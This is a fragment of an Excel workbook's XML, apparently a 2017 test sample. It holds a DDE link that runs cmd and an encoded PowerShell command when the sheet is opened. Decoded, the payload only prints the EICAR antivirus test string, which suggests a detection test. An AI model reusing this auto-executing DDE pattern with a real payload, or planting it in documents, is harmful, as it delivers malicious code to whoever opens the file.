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1570" windowHeight="2520"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet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cmd" ddeTopic="/C powershell.exe -NoExit -e ZQBjAGgAbwAgACIAWAA1AE8AIQBQACUAQABBAFAAWwA0AFwAUABaAFgANQA0ACgAUABeACkANwBDAEMAKQA3AH0AYAAkAEUASQBDAEEAUgAtAFMAVABBAE4ARABBAFIARAAtAEEATgBUAEkAVgBJAFIAVQBTAC0AVABFAFMAVAAtAEYASQBMAEUAIQBgACQASAArAEgAKgAiAA==">
    <ddeItems>
      <ddeItem name="_xlbgnm.A1" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/>
    </ddeItems>
  </dd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>
    <row r="1" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1" t="e">
        <f>[1]!_xlbgnm.A1</f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mattias.ohlsson@inprose.com</dc:creator>
  <cp:lastModifiedBy>Windows User</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-13T21:51:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-13T21:53:41Z</dcterms:modified>
</cp:coreProperties>
</file>